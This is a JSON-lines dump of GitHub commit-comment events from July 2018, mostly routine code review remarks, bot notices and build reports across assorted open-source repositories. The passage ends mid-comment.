{"id":"8026118566","type":"CommitCommentEvent","actor":{"login":"muerpa"},"repo":{"name":"Thoughtscript/x_team_tensorflow_js"},"payload":{"comment":{"id":29852732,"position":null,"line":null,"path":null,"commit_id":"9d2282f72e1dc992dd8db8e1ac2093193157130f","created_at":"2018-07-27T01:57:28Z","updated_at":"2018-07-27T01:57:28Z","author_association":"NONE","body":"I appreciate this edit! I'm wondering if you had some images of how it should look like when it is starting to predict the values for AAPL"}},"created_at":"2018-07-27T01:57:28Z"}
{"id":"8026123590","type":"CommitCommentEvent","actor":{"login":"ZchiPitt"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29852740,"position":39,"line":159,"path":"lib/Backends/OpenCL/kernels_fwd_conv.cl","commit_id":"2301b6d317a83564be2cf1457b9e82d149356b63","created_at":"2018-07-27T01:59:22Z","updated_at":"2018-07-27T01:59:22Z","author_association":"OWNER","body":"The type for Creg should be int32_t as there is already operation with offsets.  But the Dtype here is char, so i use this macro to specify."}},"created_at":"2018-07-27T01:59:22Z"}
{"id":"8026124900","type":"CommitCommentEvent","actor":{"login":"MrTus97"},"repo":{"name":"nal-hrm-2018/nal-hrm-android"},"payload":{"comment":{"id":29852741,"position":6,"line":12,"path":"build.gradle","commit_id":"ec513809211eff3a59985255dccb82d8a6c91746","created_at":"2018-07-27T01:59:53Z","updated_at":"2018-07-27T01:59:53Z","author_association":"COLLABORATOR","body":"dòng 11 với dòng 12 là làm gì ?"}},"created_at":"2018-07-27T01:59:53Z"}
{"id":"8027703127","type":"CommitCommentEvent","actor":{"login":"rom4ek737"},"repo":{"name":"epamlab7/patterns"},"payload":{"comment":{"id":29856588,"position":null,"line":null,"path":null,"commit_id":"b808cf39ce700fc5515cc7c8583780a4d3a4dcbe","created_at":"2018-07-27T10:00:14Z","updated_at":"2018-07-27T10:00:14Z","author_association":"CONTRIBUTOR","body":"added factory method and template method"}},"created_at":"2018-07-27T10:00:14Z"}
{"id":"8027712068","type":"CommitCommentEvent","actor":{"login":"1977er"},"repo":{"name":"freifunkh/ansible"},"payload":{"comment":{"id":29856604,"position":null,"line":null,"path":null,"commit_id":"5b78d60fb69233077b9546873d355ff2ac074ab5","created_at":"2018-07-27T10:02:01Z","updated_at":"2018-07-27T10:02:01Z","author_association":"CONTRIBUTOR","body":"Closes #45"}},"created_at":"2018-07-27T10:02:01Z"}
{"id":"8027721420","type":"CommitCommentEvent","actor":{"login":"DailyShana"},"repo":{"name":"Fluorohydride/ygopro-core"},"payload":{"comment":{"id":29856618,"position":null,"line":null,"path":null,"commit_id":"5a2958c64e392cc83536d5f835b264abfbe4afbe","created_at":"2018-07-27T10:04:03Z","updated_at":"2018-07-27T10:04:03Z","author_association":"COLLABORATOR","body":"It do not use it at the beginning. https://github.com/Fluorohydride/ygopro-scripts/blob/master/c60018643.lua\r\n\r\n`EFFECT_FLAG_CHAIN_UNIQUE` is designed only for some special trigger effects, see Fluorohydride/ygopro-scripts@3238a59"}},"created_at":"2018-07-27T10:04:03Z"}
{"id":"8027721959","type":"CommitCommentEvent","actor":{"login":"rom4ek737"},"repo":{"name":"epamlab7/patterns"},"payload":{"comment":{"id":29856619,"position":null,"line":null,"path":null,"commit_id":"d48c84be8cf7270000e3015a58c9be7fe902291a","created_at":"2018-07-27T10:04:10Z","updated_at":"2018-07-27T10:04:10Z","author_association":"CONTRIBUTOR","body":"added factory method and template method"}},"created_at":"2018-07-27T10:04:10Z"}
{"id":"8027722526","type":"CommitCommentEvent","actor":{"login":"deepsrd"},"repo":{"name":"berkeley-dev/android_device_huawei_charlotte"},"payload":{"comment":{"id":29856621,"position":null,"line":null,"path":null,"commit_id":"3740ccbda05ed8eec2acc0dfcec0892a1f38e745","created_at":"2018-07-27T10:04:16Z","updated_at":"2018-07-27T10:04:16Z","author_association":"NONE","body":"Does this require a framework change?"}},"created_at":"2018-07-27T10:04:16Z"}
{"id":"8027723425","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29856623,"position":null,"line":null,"path":null,"commit_id":"18cf28fb60048c5c66680e1f014431bf2e1ce8c3","created_at":"2018-07-27T10:04:27Z","updated_at":"2018-07-27T10:04:27Z","author_association":"CONTRIBUTOR","body":"This is too complex, and this actually return a list, not a module.\r\nSimpler and working:\r\n`const timelineModule = modulesById.find(module => module.getIn(['moduleType', 'identifier']) === 'TIMELINE');`\r\nI'll put the changes in my commit. The reducers to edit title and subtitle needs to be modified as well."}},"created_at":"2018-07-27T10:04:27Z"}
{"id":"8027725024","type":"CommitCommentEvent","actor":{"login":"Jorropo"},"repo":{"name":"Chocobozzz/PeerTube"},"payload":{"comment":{"id":29856625,"position":null,"line":null,"path":null,"commit_id":"18dbb5b9723040e19fea1ed6b0c4f2738508ffc8","created_at":"2018-07-27T10:04:48Z","updated_at":"2018-07-27T10:04:48Z","author_association":"CONTRIBUTOR","body":"Why ?"}},"created_at":"2018-07-27T10:04:48Z"}
{"id":"8027725629","type":"CommitCommentEvent","actor":{"login":"luk1337"},"repo":{"name":"berkeley-dev/android_device_huawei_charlotte"},"payload":{"comment":{"id":29856626,"position":null,"line":null,"path":null,"commit_id":"3740ccbda05ed8eec2acc0dfcec0892a1f38e745","created_at":"2018-07-27T10:04:56Z","updated_at":"2018-07-27T10:04:56Z","author_association":"CONTRIBUTOR","body":"uhhh it's obviously in lineage-sdk..."}},"created_at":"2018-07-27T10:04:56Z"}
{"id":"8027726622","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29856630,"position":null,"line":null,"path":null,"commit_id":"18cf28fb60048c5c66680e1f014431bf2e1ce8c3","created_at":"2018-07-27T10:05:08Z","updated_at":"2018-07-27T10:05:08Z","author_association":"CONTRIBUTOR","body":"https://facebook.github.io/immutable-js/docs/#/Map/find"}},"created_at":"2018-07-27T10:05:08Z"}
{"id":"8027731952","type":"CommitCommentEvent","actor":{"login":"Rondom"},"repo":{"name":"dokan-dev/dokany"},"payload":{"comment":{"id":29856637,"position":null,"line":null,"path":null,"commit_id":"b1d620faa798559b443c42ea2e0c1074b7f19ad6","created_at":"2018-07-27T10:06:12Z","updated_at":"2018-07-27T10:06:12Z","author_association":"CONTRIBUTOR","body":"I take it is 1.2.0 due to an ABI break in the DLL?\r\nIn this case, shouldn't we update the version as well, see #638?"}},"created_at":"2018-07-27T10:06:12Z"}
{"id":"8027732954","type":"CommitCommentEvent","actor":{"login":"AlbertZhao"},"repo":{"name":"UniqueAlex/ODC-Spider"},"payload":{"comment":{"id":29856638,"position":null,"line":null,"path":null,"commit_id":"45c21736f66701c3a93f7bf3bef0e76cc9dd888d","created_at":"2018-07-27T10:06:24Z","updated_at":"2018-07-27T10:06:24Z","author_association":"NONE","body":"Great job!"}},"created_at":"2018-07-27T10:06:24Z"}
{"id":"8027737253","type":"CommitCommentEvent","actor":{"login":"edo9300"},"repo":{"name":"Fluorohydride/ygopro-core"},"payload":{"comment":{"id":29856644,"position":null,"line":null,"path":null,"commit_id":"5a2958c64e392cc83536d5f835b264abfbe4afbe","created_at":"2018-07-27T10:07:23Z","updated_at":"2018-07-27T10:07:23Z","author_association":"CONTRIBUTOR","body":"Well, that implementation is wrong"}},"created_at":"2018-07-27T10:07:23Z"}
{"id":"8027738880","type":"CommitCommentEvent","actor":{"login":"TheUninvitedGuest"},"repo":{"name":"e2nIEE/pandapower"},"payload":{"comment":{"id":29856647,"position":null,"line":null,"path":null,"commit_id":"771bc6af25e55c0c6b6935c399132994e92fd27a","created_at":"2018-07-27T10:07:45Z","updated_at":"2018-07-27T10:07:45Z","author_association":"COLLABORATOR","body":"Travis fails on Python 3.5 specifically with this message:\r\nThe command \"conda create -q -n test-environment python=$TRAVIS_PYTHON_VERSION pip numpy scipy pandas networkx numpydoc numba xlsxwriter xlrd\" failed and exited with 1 during .\r\nWhat's different about the build/test environment compared to the previous commit?"}},"created_at":"2018-07-27T10:07:45Z"}
{"id":"8027740421","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29856648,"position":null,"line":null,"path":null,"commit_id":"3b5d778882df027953c829bad9dd4d9a21b45e89","created_at":"2018-07-27T10:08:05Z","updated_at":"2018-07-27T10:08:05Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-321](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-321).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-321-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-27T10:08:05Z"}
{"id":"8027746369","type":"CommitCommentEvent","actor":{"login":"Chocobozzz"},"repo":{"name":"Chocobozzz/PeerTube"},"payload":{"comment":{"id":29856655,"position":null,"line":null,"path":null,"commit_id":"18dbb5b9723040e19fea1ed6b0c4f2738508ffc8","created_at":"2018-07-27T10:09:21Z","updated_at":"2018-07-27T10:09:21Z","author_association":"OWNER","body":"Some instances have issues with it. This breaks the connection pool and the instance is not usable anymore."}},"created_at":"2018-07-27T10:09:21Z"}
{"id":"8027749316","type":"CommitCommentEvent","actor":{"login":"deepsrd"},"repo":{"name":"berkeley-dev/android_device_huawei_charlotte"},"payload":{"comment":{"id":29856656,"position":null,"line":null,"path":null,"commit_id":"3740ccbda05ed8eec2acc0dfcec0892a1f38e745","created_at":"2018-07-27T10:09:58Z","updated_at":"2018-07-27T10:09:58Z","author_association":"NONE","body":"Yeah, it is, just found the merges in lineage.. :) thanks!"}},"created_at":"2018-07-27T10:09:58Z"}
{"id":"8027749381","type":"CommitCommentEvent","actor":{"login":"shawnchain"},"repo":{"name":"g4klx/MMDVMHost"},"payload":{"comment":{"id":29856657,"position":33,"line":244,"path":"SerialController.cpp","commit_id":"40db88d5f8c7fd35129d7131d2f42a773b0a1889","created_at":"2018-07-27T10:09:59Z","updated_at":"2018-07-27T10:09:59Z","author_association":"CONTRIBUTOR","body":"Don't think this is a good idea to introduce the m_protocol variable to change the class behavior. Would rather introduce a new I2C controller class extending this one."}},"created_at":"2018-07-27T10:09:59Z"}
{"id":"8027753301","type":"CommitCommentEvent","actor":{"login":"MOKAKI"},"repo":{"name":"MOKAKI/STC"},"payload":{"comment":{"id":29856664,"position":null,"line":null,"path":null,"commit_id":"51b9d7290706dcf90d672207875c14cade57efc2","created_at":"2018-07-27T10:10:51Z","updated_at":"2018-07-27T10:10:51Z","author_association":"OWNER","body":"STC 提交20160726"}},"created_at":"2018-07-27T10:10:51Z"}
{"id":"8027755875","type":"CommitCommentEvent","actor":{"login":"evesala"},"repo":{"name":"open-campaign-logger/generator-library"},"payload":{"comment":{"id":29856669,"position":null,"line":null,"path":null,"commit_id":"dfe64b1b6662b06d1be38b80fbf54c8bc49cacf6","created_at":"2018-07-27T10:11:26Z","updated_at":"2018-07-27T10:11:26Z","author_association":"COLLABORATOR","body":"Nice! It's good to have a ready, filled-out example at hand for future reference. "}},"created_at":"2018-07-27T10:11:26Z"}
{"id":"8027766141","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29856685,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-27T10:13:39Z","updated_at":"2018-07-27T10:13:39Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T10:13:39Z"}
{"id":"8027766479","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29856686,"position":null,"line":null,"path":null,"commit_id":"9655ee264b3c2db52e7cf57fe0d73e331d2e9461","created_at":"2018-07-27T10:13:43Z","updated_at":"2018-07-27T10:13:43Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1698 of 1698 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9655ee264b3c2db52e7cf57fe0d73e331d2e9461-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9655ee264b3c2db52e7cf57fe0d73e331d2e9461-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9655ee264b3c2db52e7cf57fe0d73e331d2e9461-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.04%25-green.png)</a>\n"}},"created_at":"2018-07-27T10:13:43Z"}
{"id":"8027767188","type":"CommitCommentEvent","actor":{"login":"murata-bulky"},"repo":{"name":"murata-bulky/demo"},"payload":{"comment":{"id":29856688,"position":null,"line":null,"path":null,"commit_id":"3736e65ff973c414925e68da10c56f25badf7202","created_at":"2018-07-27T10:13:53Z","updated_at":"2018-07-27T10:13:53Z","author_association":"OWNER","body":"コミット"}},"created_at":"2018-07-27T10:13:53Z"}
{"id":"8027767871","type":"CommitCommentEvent","actor":{"login":"ButcherV"},"repo":{"name":"ButcherV/Vue-study"},"payload":{"comment":{"id":29856690,"position":null,"line":null,"path":null,"commit_id":"19647c0e77daec7b909975c41674221d7de324ca","created_at":"2018-07-27T10:14:02Z","updated_at":"2018-07-27T10:14:02Z","author_association":"OWNER","body":"知识点：\r\n\r\n1. 三括号的形式 {{{}}} ，在 vue 2.0 中是否已不存在这种语法。\r\n2. 学习 ` 符号在 es6 的模板语法代表的意义\r\n3. 代码中的标点错误，不是 vue 的问题，不应在 browser inspector 中排错。应在编辑器中安装 eslint 插件来规避该问题。\r\n4. `function foo() {} ()` 意为直接调用（但编辑器可能读不懂最后的括号是什么意思）。\r\n`(function foo() {})()` 意为直接调用。\r\n`function foo() {} `只是个函数，不会直接调用。\r\n`const a = function foo() {};` 执行 `a() ` 才会调用。\r\n5. \r\n```\r\nselectTab(id) {\r\n    this.activeTab = id\r\n}\r\n```\r\n`selectTab: function(id) {}` \r\n以上两种形式是等价的，所以` selectTab(index) `就等于直接调用了。\r\n6.  `<div class=\"nav-item\" v-for=\"(item, index) of list\" :click=\"selectTab(index)\" :class=\"{ 'is-active': activeTab == index }\">{{ item.tabName }}</div>`导致报错的原因及原理。\r\n7. v-for / v-if 的优先级，以及这里的最优写法。`{{ list[activeTab].tabContent }}`"}},"created_at":"2018-07-27T10:14:02Z"}
{"id":"8027776218","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pyhum-feedstock"},"payload":{"comment":{"id":29856701,"position":null,"line":null,"path":null,"commit_id":"e1564710ed6979ca4251fe42e188f58f20f7561f","created_at":"2018-07-27T10:15:53Z","updated_at":"2018-07-27T10:15:53Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @dbuscombe-usgs was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-27T10:15:53Z"}
{"id":"8027785179","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"VladYermakov/chatter"},"payload":{"comment":{"id":29856714,"position":null,"line":null,"path":null,"commit_id":"da1052559eaec356332d3875cdd29eff0ca22c8f","created_at":"2018-07-27T10:17:52Z","updated_at":"2018-07-27T10:17:52Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #9 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-27T10:17:52Z"}
{"id":"8027793322","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"VladYermakov/chatter"},"payload":{"comment":{"id":29856718,"position":null,"line":null,"path":null,"commit_id":"89a706f938e8019c1d007d01b9ba27353fed6f18","created_at":"2018-07-27T10:19:47Z","updated_at":"2018-07-27T10:19:47Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #3 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-27T10:19:47Z"}
{"id":"8027798740","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"VladYermakov/chatter"},"payload":{"comment":{"id":29856724,"position":null,"line":null,"path":null,"commit_id":"af40a0b97191245249d67148fcd9448d4ee51869","created_at":"2018-07-27T10:20:59Z","updated_at":"2018-07-27T10:20:59Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #7 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-27T10:20:59Z"}
{"id":"8027799026","type":"CommitCommentEvent","actor":{"login":"fugr"},"repo":{"name":"upmio/swarm"},"payload":{"comment":{"id":29856725,"position":null,"line":null,"path":null,"commit_id":"225f309735ad4446d6ab4db5d0056dd965f5af27","created_at":"2018-07-27T10:21:03Z","updated_at":"2018-07-27T10:21:03Z","author_association":"NONE","body":"#62 "}},"created_at":"2018-07-27T10:21:03Z"}
{"id":"8027799349","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"VladYermakov/chatter"},"payload":{"comment":{"id":29856726,"position":null,"line":null,"path":null,"commit_id":"3886520f1877d56fb4471e2751a9fd168502c9ea","created_at":"2018-07-27T10:21:08Z","updated_at":"2018-07-27T10:21:08Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #4 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-27T10:21:08Z"}
{"id":"8027799775","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"VladYermakov/chatter"},"payload":{"comment":{"id":29856727,"position":null,"line":null,"path":null,"commit_id":"5f032f1ead2a7df0e1c32a07672230a52aa4915f","created_at":"2018-07-27T10:21:13Z","updated_at":"2018-07-27T10:21:13Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #5 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-27T10:21:13Z"}
{"id":"8027800183","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"VladYermakov/chatter"},"payload":{"comment":{"id":29856728,"position":null,"line":null,"path":null,"commit_id":"0b9dab109d0e2461d8e08ee07368bf43d549a736","created_at":"2018-07-27T10:21:19Z","updated_at":"2018-07-27T10:21:19Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #6 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-27T10:21:19Z"}
{"id":"8027801060","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"VladYermakov/chatter"},"payload":{"comment":{"id":29856729,"position":null,"line":null,"path":null,"commit_id":"da1052559eaec356332d3875cdd29eff0ca22c8f","created_at":"2018-07-27T10:21:31Z","updated_at":"2018-07-27T10:21:31Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #9 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-27T10:21:31Z"}
{"id":"8027801450","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"VladYermakov/chatter"},"payload":{"comment":{"id":29856731,"position":null,"line":null,"path":null,"commit_id":"6dbbc5eefe75691838f05a1bc05249bf1fa4a7e8","created_at":"2018-07-27T10:21:36Z","updated_at":"2018-07-27T10:21:36Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #8 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-27T10:21:36Z"}
{"id":"8027802157","type":"CommitCommentEvent","actor":{"login":"fugr"},"repo":{"name":"upmio/swarm"},"payload":{"comment":{"id":29856732,"position":null,"line":null,"path":null,"commit_id":"7c9d1c348cb51cdf7b626d47e871fa9adc85fa4f","created_at":"2018-07-27T10:21:46Z","updated_at":"2018-07-27T10:21:46Z","author_association":"NONE","body":"#61 "}},"created_at":"2018-07-27T10:21:46Z"}
{"id":"8027805645","type":"CommitCommentEvent","actor":{"login":"edo9300"},"repo":{"name":"Fluorohydride/ygopro-core"},"payload":{"comment":{"id":29856742,"position":null,"line":null,"path":null,"commit_id":"5a2958c64e392cc83536d5f835b264abfbe4afbe","created_at":"2018-07-27T10:22:35Z","updated_at":"2018-07-27T10:22:35Z","author_association":"CONTRIBUTOR","body":"Well, that implementation is wrong since it still allows multiple triggers at the same time. We've done multiple tests, even with flags in the condition, but they're evaluated too late. The only way to make it work was with that flag _also that flag name describes exactly the behaviour needed by the card \"chain unique\"_, also if this was made for special triggers how are they handled now?"}},"created_at":"2018-07-27T10:22:35Z"}
{"id":"8027835491","type":"CommitCommentEvent","actor":{"login":"saikiransingh007"},"repo":{"name":"saikiransingh007/Hello-World"},"payload":{"comment":{"id":29856780,"position":null,"line":null,"path":null,"commit_id":"2a8d68b18726de55a0d90e1132d44d33ccfab06a","created_at":"2018-07-27T10:29:26Z","updated_at":"2018-07-27T10:29:26Z","author_association":"OWNER","body":"What happened is that I compare the file in the reverse order like in place of base I used that compare master.\r\njust a non-sense. "}},"created_at":"2018-07-27T10:29:26Z"}
{"id":"8027837236","type":"CommitCommentEvent","actor":{"login":"NerDor"},"repo":{"name":"NerDor/index"},"payload":{"comment":{"id":29856782,"position":null,"line":null,"path":null,"commit_id":"69ed28d08458894449ec3a8fcce5071f5af9b4c2","created_at":"2018-07-27T10:29:50Z","updated_at":"2018-07-27T10:29:50Z","author_association":"OWNER","body":"11"}},"created_at":"2018-07-27T10:29:50Z"}
{"id":"8027844214","type":"CommitCommentEvent","actor":{"login":"walkermatt"},"repo":{"name":"jonataswalker/ol-geocoder"},"payload":{"comment":{"id":29856797,"position":null,"line":null,"path":null,"commit_id":"552d87f5ad77292c0c7a302fad5b4820db5f22c2","created_at":"2018-07-27T10:31:26Z","updated_at":"2018-07-27T10:31:26Z","author_association":"COLLABORATOR","body":"@jonataswalker would you mind reviewing, I've tested in Edge 16 & 17."}},"created_at":"2018-07-27T10:31:26Z"}
{"id":"8027863572","type":"CommitCommentEvent","actor":{"login":"martinda"},"repo":{"name":"jenkinsci/jep"},"payload":{"comment":{"id":29856826,"position":91,"line":91,"path":"jep/8/README.adoc","commit_id":"b7fe523450c1c34a57c61923695d3b9049280dff","created_at":"2018-07-27T10:36:01Z","updated_at":"2018-07-27T10:36:01Z","author_association":"CONTRIBUTOR","body":"unless approved by"}},"created_at":"2018-07-27T10:36:01Z"}
{"id":"8027869178","type":"CommitCommentEvent","actor":{"login":"akitoc"},"repo":{"name":"akitoc/assessment"},"payload":{"comment":{"id":29856834,"position":null,"line":null,"path":null,"commit_id":"951b45d68ca70e6b0b2fa18c57b64cf8d0d41e0b","created_at":"2018-07-27T10:37:23Z","updated_at":"2018-07-27T10:37:23Z","author_association":"OWNER","body":"951b45d で対応されました。"}},"created_at":"2018-07-27T10:37:23Z"}
{"id":"8027872307","type":"CommitCommentEvent","actor":{"login":"jonwd7"},"repo":{"name":"niftools/nifxml"},"payload":{"comment":{"id":29856845,"position":null,"line":null,"path":null,"commit_id":"97a81c8e501a31d3906fedca03b8ff89f1de3181","created_at":"2018-07-27T10:38:07Z","updated_at":"2018-07-27T10:38:07Z","author_association":"MEMBER","body":"@neomonkeus  The declaration order in the XML.   But if I put `NiTFixedStringMap` and `NiTFixedStringMapItem` at the bottom of the XML, then the `<niobject>` etc. that use it, it wouldn't be defined yet. "}},"created_at":"2018-07-27T10:38:07Z"}
{"id":"8027872947","type":"CommitCommentEvent","actor":{"login":"p0deje"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":29856848,"position":6,"line":362,"path":"rb/lib/selenium/webdriver/remote/w3c/bridge.rb","commit_id":"da6efc1b1b4809e20930050fe3a369032d00e1b7","created_at":"2018-07-27T10:38:16Z","updated_at":"2018-07-27T10:38:16Z","author_association":"MEMBER","body":"@twalpole Ok. In any event, thanks for bringing that up and I hope this dirty code will work for you."}},"created_at":"2018-07-27T10:38:16Z"}
{"id":"8027873670","type":"CommitCommentEvent","actor":{"login":"martinda"},"repo":{"name":"jenkinsci/jep"},"payload":{"comment":{"id":29856850,"position":106,"line":106,"path":"jep/8/README.adoc","commit_id":"b7fe523450c1c34a57c61923695d3b9049280dff","created_at":"2018-07-27T10:38:27Z","updated_at":"2018-07-27T10:38:27Z","author_association":"CONTRIBUTOR","body":"TTravel -> Travel"}},"created_at":"2018-07-27T10:38:27Z"}
{"id":"8027873696","type":"CommitCommentEvent","actor":{"login":"koalasbruder"},"repo":{"name":"koalasbruder/Projects"},"payload":{"comment":{"id":29856851,"position":null,"line":null,"path":null,"commit_id":"c65dabb35f2de7d2a9626ef0cd01437df0594613","created_at":"2018-07-27T10:38:27Z","updated_at":"2018-07-27T10:38:27Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[Processing] ImageShower](https://trello.com/c/7ZugWyTx/1-processing-imageshower)"}},"created_at":"2018-07-27T10:38:27Z"}
{"id":"8027877033","type":"CommitCommentEvent","actor":{"login":"SleepingDisorder"},"repo":{"name":"ryanshdsdev/ryanbot"},"payload":{"comment":{"id":29856854,"position":null,"line":null,"path":null,"commit_id":"084bc23fc2ae134074644a498f90ec9cb089fedd","created_at":"2018-07-27T10:39:16Z","updated_at":"2018-07-27T10:39:16Z","author_association":"NONE","body":"Thanks m8"}},"created_at":"2018-07-27T10:39:16Z"}
{"id":"8027885579","type":"CommitCommentEvent","actor":{"login":"jonwd7"},"repo":{"name":"niftools/nifxml"},"payload":{"comment":{"id":29856866,"position":null,"line":null,"path":null,"commit_id":"97a81c8e501a31d3906fedca03b8ff89f1de3181","created_at":"2018-07-27T10:41:26Z","updated_at":"2018-07-27T10:41:26Z","author_association":"MEMBER","body":"`NiTFixedStringMap` could technically map another `NiFixedString` to the `NiFixedString` also, but this is never used in serialization, only runtime. \r\n\r\n`NiTFixedStringMap` is actually only used once period for serialization, but I didn't want to create a made up compound just for the one usage and opted to maintain the generic type."}},"created_at":"2018-07-27T10:41:26Z"}
{"id":"8027896310","type":"CommitCommentEvent","actor":{"login":"leo-yuriev"},"repo":{"name":"rurban/smhasher"},"payload":{"comment":{"id":29856872,"position":6,"line":137,"path":"Hashes.h","commit_id":"9c7f61e11d0a51988000e75805261b84160a689a","created_at":"2018-07-27T10:44:03Z","updated_at":"2018-07-27T10:44:03Z","author_association":"CONTRIBUTOR","body":"May be *(uint64_t*)out = (uint64_t) jody_block_hash(..) here?"}},"created_at":"2018-07-27T10:44:03Z"}
{"id":"8027897855","type":"CommitCommentEvent","actor":{"login":"danieldeidda"},"repo":{"name":"danieldeidda/STIR"},"payload":{"comment":{"id":29856873,"position":null,"line":null,"path":null,"commit_id":"ee8b799e38ad842a14f4b79a1ab90472b9439015","created_at":"2018-07-27T10:44:25Z","updated_at":"2018-07-27T10:44:25Z","author_association":"OWNER","body":"Following previous messages, it seemed that we agreed to go on with the KOSMAPOSL implementation while keeping the discussion open. I think this can be a starting point. In this version KOSMAPOSL override update_estimate(TargetT &current_alpha_coefficent_image) from OSMAPOSL. The current estimate has to be alpha, In the previous discussion we were thinking to keep the PET image but this would not work as the kernel depends on alpha and when we run compute_kernelised_image () we need the alpha image.\r\n\r\nAs a consequence we need to call compute_kernelised_image () to:\r\n\r\n \r\n\r\n1.  obtain current_PET_estimate and pass it to compute_sub_gradient_without_penalty_plus_sensitivity()(this will give the multiplicative update) ;\r\n2. At this point, _compute_kernelised_image ()_ is called to calculate **kmultiplicative update** and **ksens**, which will be used in the division;\r\n3. the result of the division is now multiplied to **current_alpha** which will be passed to Reconstruction and used in the next iteration;\r\n4. finally, the **current_alpha** is kernelised to obtained the PET estimate and will be written according to the interval we choose in the parfile.\r\n\r\nHKEM is the most general case and we can obtain others as follows:\r\n\r\n1. hybrid=0 => KEM;\r\n2. hybrid=0 & anatomical image =uniform => Sieves (I guess);\r\n3. hybrid=0 & num_neighjbourhood=1 => OSEM.\r\n\r\nif disable output :=1 only the PET images will be written in the disk.\r\nBTW the reconstruction is around 20 faster for some reason, and the recon images are exactly the same as the objective function 